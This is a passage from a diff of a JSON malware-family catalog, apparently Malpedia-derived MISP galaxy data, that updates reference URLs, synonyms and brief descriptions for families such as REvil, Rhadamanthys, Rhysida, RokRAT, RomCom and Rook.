"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", "https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware", - "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", - "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", - "https://analyst1.com/file-assets/History-of-REvil.pdf", - "https://twitter.com/_alex_il_/status/1412403420217159694", - "https://twitter.com/svch0st/status/1411537562380816384", - "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20", - "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html", - "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/", - "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-southfield", - "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", - "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", - "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html", - "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html", - "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://blog.amossys.fr/sodinokibi-malware-analysis.html", - "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", - "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", - "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", - "https://www.connectwise.com/resources/revil-profile", + "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html", + "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/", + "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", "https://isc.sans.edu/diary/27012", - "https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states", - "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs" + "https://vimeo.com/449849549", + "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/", + "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", + "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics", + "https://threatintel.blog/OPBlueRaven-Part1/", + "https://twitter.com/fwosar/status/1420119812815138824", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://hatching.io/blog/ransomware-part2", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20", + "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", + "https://www.youtube.com/watch?v=tZVFMVm5GAk", + "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", + "https://asec.ahnlab.com/ko/19640/", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", + "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f", + "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain", + "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/", + "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", + "https://www.cyjax.com/2021/07/09/revilevolution/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.youtube.com/watch?v=QYQQUUpU04s", + "https://analyst1.com/file-assets/History-of-REvil.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf" ], "synonyms": [ "Sodin", @@ -41635,16 +43587,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", - "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf", - "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", - "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", - "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", - "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", + "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf", + "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", - "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran" + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" ], "synonyms": [], "type": [] @@ -41657,14 +43609,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys", - "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", "https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/", - "https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88", - "https://www.malware-traffic-analysis.net/2023/01/03/index.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.zscaler.com/blogs/security-research/technical-analysis-rhadamanthys-obfuscation-techniques", + "https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/", "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023", + "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", + "https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88", + "https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/", + "https://www.malware-traffic-analysis.net/2023/01/03/index.html", "https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/", - "https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/" + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [], "type": [] @@ -41698,6 +43655,25 @@ "uuid": "5f1bac43-6506-43f0-b5d6-709a39abd671", "value": "RHttpCtrl" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida", + "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", + "https://www.bleepingcomputer.com/news/security/rhysida-ransomware-behind-recent-attacks-on-healthcare/", + "https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html", + "https://www.linkedin.com/posts/prodaft_organic-relationship-between-rhysida-vice-activity-7091777236663427072-NQEs", + "https://www.sentinelone.com/blog/rhysida-ransomware-raas-crawls-out-of-crimeware-undergrowth-to-attack-chilean-army/", + "https://blog.talosintelligence.com/rhysida-ransomware/", + "https://www.secplicity.org/2023/05/23/scratching-the-surface-of-rhysida-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7d77891-afc2-4be6-b831-a3b2253fb195", + "value": "Rhysida" + }, { "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.", "meta": { @@ -41718,9 +43694,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor", - "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf", + "https://mega.nz/file/lkh1gY5C#93FUlwTwl0y27cfM0jtm4SYnWbtk06d0qoDg1e4eQ6s", + "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" + "http://www.issuemakerslab.com/research3/", + "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] @@ -41786,10 +43764,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", - "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/" ], "synonyms": [], "type": [] @@ -41802,8 +43780,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3", - "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/", - "https://twitter.com/URSNIFleak" + "https://twitter.com/URSNIFleak", + "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/" ], "synonyms": [], "type": [] @@ -41816,48 +43794,62 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", - "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", - "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", - "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf", - "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", + "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf", "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/", - "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf" + "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf", + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [ "Gussdoor", - "Remote Manipulator System" + "Remote Manipulator System", + "RuRAT" ], "type": [] }, "uuid": "94339b04-9332-4691-b820-5021368f1d3a", "value": "RMS" }, + { + "description": "According to SOCRadar, this is a batch script that uses WinRAR to delete files with target file extensions from a disk.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roar_bat", + "https://socradar.io/sandworm-attackers-use-winrar-to-wipe-data-from-government-devices/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ef66505-9b5b-4a80-af64-b51dc7a006ba", + "value": "RoarBAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood", - "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", - "https://goggleheadedhacker.com/blog/post/12", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", - "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://twitter.com/VK_Intel/status/1121440931759128576", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/", - "https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/", - "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", - "https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://goggleheadedhacker.com/blog/post/12", + "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", + "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/", - "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/" + "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/", + "https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/", + "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://twitter.com/VK_Intel/status/1121440931759128576", + "https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/", + "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/", + "https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf" ], "synonyms": [ "RobbinHood" @@ -41886,10 +43878,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://intel471.com/blog/a-brief-history-of-ta505" + "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware", + "https://intel471.com/blog/a-brief-history-of-ta505", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [], "type": [] @@ -41914,9 +43906,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin", - "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/", "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/" ], @@ -41944,35 +43936,36 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", - "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/", - "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", - "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", - "https://asec.ahnlab.com/en/51751/", - "https://www.ibm.com/downloads/cas/Z81AVOY7", "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", "https://www.youtube.com/watch?v=uoBQE5s2ba4", - "http://v3lo.tistory.com/24", - "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48", - "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/", + "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://twitter.com/ESETresearch/status/1575103839115804672", "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf", + "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", + "http://v3lo.tistory.com/24", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://twitter.com/ESETresearch/status/1575103839115804672", + "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48", + "https://asec.ahnlab.com/en/51751/", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab", + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", + "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", + "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", + "https://unit42.paloaltonetworks.com/atoms/moldypisces/", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", - "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.ibm.com/downloads/cas/Z81AVOY7", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", - "https://unit42.paloaltonetworks.com/atoms/moldypisces/", - "https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab" + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/" ], "synonyms": [ "DOGCALL" @@ -42019,10 +44012,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat", + "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/", + "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html", + "https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/", "https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries", - "https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass", + "https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit", + "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/", "https://cert.gov.ua/article/3349703", - "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/" + "https://labs.k7computing.com/index.php/romcom-rat-not-your-typical-love-story/", + "https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass" ], "synonyms": [], "type": [] @@ -42043,18 +44041,18 @@ "value": "Romeo(Alfa,Bravo, ...)" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Rook is ransomware (an updated variant of Babuk) that prevents victims from accessing/opening files by encrypting them. It also modifies filenames and creates a text file/ransom note (\"HowToRestoreYourFiles.txt\"). Rook renames files by appending the \".Rook\" extension. For example, it renames \"1.jpg\" to \"1.jpg.Rook\", \"2.jpg\" to \"2.jpg.Rook\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rook", + "https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://seguranca-informatica.pt/rook-ransomware-analysis/", "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", "https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit.md", - "https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/", - "https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/", - "https://seguranca-informatica.pt/rook-ransomware-analysis/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/" ], "synonyms": [], "type": [] @@ -42093,9 +44091,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach", "https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html", - "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/", "https://www.group-ib.com/blog/bablock-ransomware/", "https://medium.com/@simone.kraus/rorschach-ransomware-analysis-with-attack-flow-7fa5ff613a75", + "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/d/an-analysis-of-the-bablock-ransomware-/iocs-an-analysis-of-the-babLock-ransomware.txt" ], "synonyms": [ @@ -42126,10 +44124,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roshtyak", - "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", - "https://unit42.paloaltonetworks.com/unsigned-dlls/", "https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/" + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://unit42.paloaltonetworks.com/unsigned-dlls/", + "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/" ], "synonyms": [], "type": [] @@ -42173,17 +44171,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", "https://securelist.com/oh-what-a-boot-iful-mornin/97365", + "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", - "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", - "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", - "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", - "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/" + "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", + "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", + "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0" ], 